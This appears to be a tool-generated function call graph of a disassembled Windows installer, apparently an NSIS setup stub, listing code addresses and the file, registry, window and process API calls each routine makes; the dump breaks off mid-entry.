402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 